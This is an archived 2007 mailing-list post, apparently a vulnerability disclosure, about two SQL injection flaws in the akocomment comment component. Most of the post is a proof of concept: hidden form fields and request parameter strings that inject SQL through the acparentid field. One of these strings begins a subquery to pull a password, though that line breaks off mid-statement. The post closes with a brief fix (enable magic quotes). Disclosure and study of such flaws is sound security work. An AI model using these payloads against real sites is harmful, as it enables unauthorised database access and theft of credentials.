|
|||||||||||
|
akocomment SQL INJECTION (all version)
From: Emanuele Gentili <bathym(at)gechi.it>
Date: Fri Jun 29 2007 - 17:12:37 EDT
there are two SQL injection. POC: <INPUT TYPE='hidden' NAME='acitemid' value='9'><INPUT TYPE='hidden' NAME='acparentid' value=''><INPUT TYPE='hidden' NAME='contentid' value='633'> acparentid=633 e acitemid=9 option=com_akocomment&acitemid=9&acparentid=&contentid=633&func=entry&acname=Visitatore&title=aa&comment=af&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1',name='test',title='titolo',comment='commento',date=0,published=1/*
option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1',name=(select
top 1 password from
it work only for magic quotes are off. alpha fix: enable magic quotes. Received on Mon Jul 2 13:16:18 2007 This archive was generated by hypermail 2.1.8 : Mon Jul 02 2007 - 13:20:05 EDT |
||||||||||
|
|||||||||||